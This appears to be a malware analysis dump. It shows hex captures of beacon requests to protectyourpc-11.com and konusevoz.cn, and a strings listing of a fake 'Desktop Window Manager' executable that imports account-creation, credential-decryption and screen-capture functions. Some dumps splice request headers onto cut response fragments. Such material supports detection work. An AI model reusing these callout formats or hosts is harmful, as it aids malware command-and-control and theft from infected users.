0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a 20746869 73207365   lose.... this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7632 39267379 7374656d   ype=g_v29&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 355f315f   status=err095_1_
0x00000070 (00112)   32266e3d 30266578 7472613d 30204854   2&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f672f74 2e706870 3f713d25   GET /g/t.php?q=%
0x00000010 (00016)   32424930 75467a31 51714758 356e6e70   2BI0uFz1QqGX5nnp
0x00000020 (00032)   434d5347 74657148 644a4249 38564b73   CMSGteqHdJBI8VKs
0x00000030 (00048)   48707431 56594539 58725166 557a3341   Hpt1VYE9XrQfUz3A
0x00000040 (00064)   62506b62 754a7550 55495238 63787751   bPkbuJuPUIR8cxwQ
0x00000050 (00080)   62584d6a 39756725 33442533 44204854   bXMj9ug%3D%3D HT
0x00000060 (00096)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000070 (00112)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000080 (00128)   206b6f6e 75736576 6f7a2e63 6e0d0a41    konusevoz.cn..A
0x00000090 (00144)   63636570 743a202a 2f2a0d0a 0d0a6c65   ccept: */*....le
0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f672f70 2e706870 3f713d74   GET /g/p.php?q=t
0x00000010 (00016)   54777677 32307230 626a7466 33475459   Twvw20r0bjtf3GTY
0x00000020 (00032)   46375878 65702532 46414f45 54586448   F7Xxep%2FAOETXdH
0x00000030 (00048)   466d4730 76773231 62316248 74345753   FmG0vw21b1bHt4WS
0x00000040 (00064)   46796e75 37584777 25334420 48545450   Fynu7XGw%3D HTTP
0x00000050 (00080)   2f312e31 0d0a436f 6e6e6563 74696f6e   /1.1..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a206b   : close..Host: k
0x00000070 (00112)   6f6e7573 65766f7a 2e636e0d 0a416363   onusevoz.cn..Acc
0x00000080 (00128)   6570743a 202a2f2a 0d0a0d0a 6e0d0a41   ept: */*....n..A
0x00000090 (00144)   63636570 743a202a 2f2a0d0a 0d0a6c65   ccept: */*....le
0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f672f69 692e7068 70204854   GET /g/ii.php HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000030 (00048)   206b6f6e 75736576 6f7a2e63 6e0d0a41    konusevoz.cn..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 0d0a5450   ccept: */*....TP
0x00000050 (00080)   2f312e31 0d0a436f 6e6e6563 74696f6e   /1.1..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a206b   : close..Host: k
0x00000070 (00112)   6f6e7573 65766f7a 2e636e0d 0a416363   onusevoz.cn..Acc
0x00000080 (00128)   6570743a 202a2f2a 0d0a0d0a 6e0d0a41   ept: */*....n..A
0x00000090 (00144)   63636570 743a202a 2f2a0d0a 0d0a6c65   ccept: */*....le
0x000000a0 (00160)   3e343034 204e6f74 20466f75 6e643c2f   >404 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7632 39267379 7374656d   ype=g_v29&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 335f3536   status=err093_56
0x00000070 (00112)   5f30266e 3d302665 78747261 3d302048   _0&n=0&extra=0 H
0x00000080 (00128)   5454502f 312e310d 0a486f73 743a2070   TTP/1.1..Host: p
0x00000090 (00144)   726f7465 6374796f 75727063 2d31312e   rotectyourpc-11.
0x000000a0 (00160)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000b0 (00176)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x000000c0 (00192)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x000000d0 (00208)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x000000e0 (00224)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x000000f0 (00240)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000100 (00256)   6f6e3a20 636c6f73 650d0a0d 0a207365   on: close.... se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
...
6!.d..
..j.6
L.we......$hU#v
\9./a.
.rHd.
..M!
.d
.
1:..../.H.#.
.
....SL....B.!.
..
'.

040904b0
1, 0, 0, 1
1100
b&f@
c3.exe
Copyright (C) 2010
!DDe
Desktop Window Manager
FileDescription
FileVersion
InternalName
LegalCopyright
&Main
MS Sans Serif
OriginalFilename
PrivateBuild
ProductVersion
S&top
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
|	{$<<
01wxz{
1_Ol1#
&1%;'P
)1tl.B=T
	*3WvWc
4h?y4|3
4ySvn%g
52a	:/
>?53V8
5("JR/Ao9^
5.]VE=
\6k\R7
?6*m9S
	]7=NO
8j}pjy
8.mWWG
{93O\+
]9:\N	P
a!=~,(
,+AV_H
BitBlt
CloseHandle
CLSIDFromProgID
CLSIDFromString
CoAllowSetForegroundWindow
CoCreateGuid
CoCreateInstance
CoGetClassObject
CoInitializeEx
CoInitializeSecurity
CommandLineToArgvW
CoSetProxyBlanket
CoTaskMemAlloc
CoTaskMemFree
CoUninitialize
co<VD;a;
CreateCompatibleBitmap
CreateCompatibleDC
CreateEventW
CreateFileW
CreateMutexW
CreateSolidBrush
CreateStreamOnHGlobal
CreateThread
CRYPT32.dll
CryptProtectData
CryptUnprotectData
@.data
DDRAW.dll
DeleteCriticalSection
DeleteDC
DeleteObject
DirectDrawCreate
DirectDrawCreateEx
DirectDrawEnumerateA
DMTkCI
"\#eHg
EnterCriticalSection
ExitProcess
;FDO{x)7y
FindExecutableW
FindResourceExW
FindResourceW
FlushInstructionCache
FormatMessageW
FreeLibrary
\=FtZi
/f%wHVX
GDI32.dll
GdipAlloc
GdipCloneImage
GdipCreateBitmapFromFile
GdipCreateBitmapFromFileICM
GdipCreateHBITMAPFromBitmap
GdipDisposeImage
GdipFree
gdiplus.dll
GdiplusShutdown
GdiplusStartup
GetACP
GetComputerNameW
GetCurrentProcess
GetCurrentThreadId
GetDeviceCaps
GetFileVersionInfoSizeW
GetFileVersionInfoW
GetLastError
GetLocaleInfoA
GetLocaleInfoW
GetModuleFileNameW
GetModuleHandleW
GetObjectW
GetProcAddress
GetProcessHeap
GetProcessId
GetProcessVersion
GetStartupInfoW
GetStockObject
GetSystemDirectoryW
GetSystemInfo
GetSystemTimeAsFileTime
GetTempPathW
GetThreadLocale
GetTickCount
GetUserNameExW
GetVersionExA
GetVersionExW
GlobalAlloc
GlobalFree
GlobalHandle
GlobalLock
GlobalUnlock
gNE|v1
H?4~2?%
HCJ;cn
HeapAlloc
HeapDestroy
HeapFree
HeapReAlloc
HeapSetInformation
HeapSize
hhroyI
HhTHWv
hhVirt
hLibrhK
hLocaho7@
H<`O>$>h|
hShVu@
i;5jAl
,I'8'x4
IF'Ko[
InitializeCriticalSection
InterlockedCompareExchange
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
iq~L8(
IsDebuggerPresent
IsProcessorFeaturePresent
iW}TK@
(JaP($
jmt]]b
K7*R);
KERNEL32.dll
k?V7+&
LCMapStringW
LcPPF-
LD#C-g
LeaveCriticalSection
-L$Jg&
](LKLA@
:lkzzB
LoadLibraryA
LoadLibraryExW
LoadLibraryW
LoadResource
LocalAlloc
LocalFree
LockResource
L)-P-%
]-l^SP
lstrcmpW
lstrlenA
lstrlenW
-;l=xj
mr9^(	
MulDiv
MultiByteToWideChar
/m=wI	+8<
MzLmY3W
%N*` 4
^*Nd)b
NETAPI32.dll
NetApiBufferFree
NetGetJoinInformation
NetLocalGroupAddMembers
NetUserAdd
NetUserDel
NetUserEnum
NetUserGetLocalGroups
NetWkstaUserGetInfo
Ngw8@Ww_U
n]	(S:zq
|)?N[XQ~
o\i]=	
ole32.dll
OleInitialize
OleLockRunning
OleUninitialize
OpenProcess
PathAppendW
PathCombineW
PD"]pN
_p^fTlU1[
%PHwA!
/P/LP{
PLPxs6 
/PPP9o0jmi~
?P{qK}
ProcessIdToSessionId
$PW0w%
p\ws3iw
+/_Q~:
Q4DG2?1
(QLq2q
QueryPerformanceCounter
RaiseException
rAXN_lPs
`.rdata
ReleaseMutex
ResetEvent
~r:o9'
rp'F!-z
$S>}Dq
Secur32.dll
SelectObject
SetEvent
SetLastError
SetUnhandledExceptionFilter
SHAppBarMessage
SHELL32.dll
ShellExecuteExW
ShellExecuteW
Shell_NotifyIconW
SHGetFolderPathW
SHLWAPI.dll
SizeofResource
StringFromCLSID
StringFromGUID2
TerminateProcess
TfcGE</
;tfdte
!This program cannot be run in DOS mode.
TmCYMW
TMjx<s
TN	4r3it
TP5.P)
tr/1GVX
TYh<P@
\_U^cX)
ui[U8A
UnhandledExceptionFilter
UrlApplySchemeW
UrlCanonicalizeW
UrlCombineW
UrlGetPartW
UZ6$'gLO
$V1@u@k
VerQueryValueW
VERSION.dll
VirtualAlloc
VirtualFree
VirtualLock
VirtualUnlock
?vRwVh\
vsSGdf
Vzy:2#
w}2{v.
WaitForMultipleObjects
WaitForSingleObject
:WCpVJ
Whii+,
!w>"Hw
WideCharToMultiByte
WTSAPI32.dll
WTSEnumerateSessionsW
WTSFreeMemory
WTSQuerySessionInformationW
WTSRegisterSessionNotification
WTSUnRegisterSessionNotification
wUzg	9"
x'FBxs19(
XPzF`>Q
xw{_kf
Z	6*|X
ZE@wL<6Dp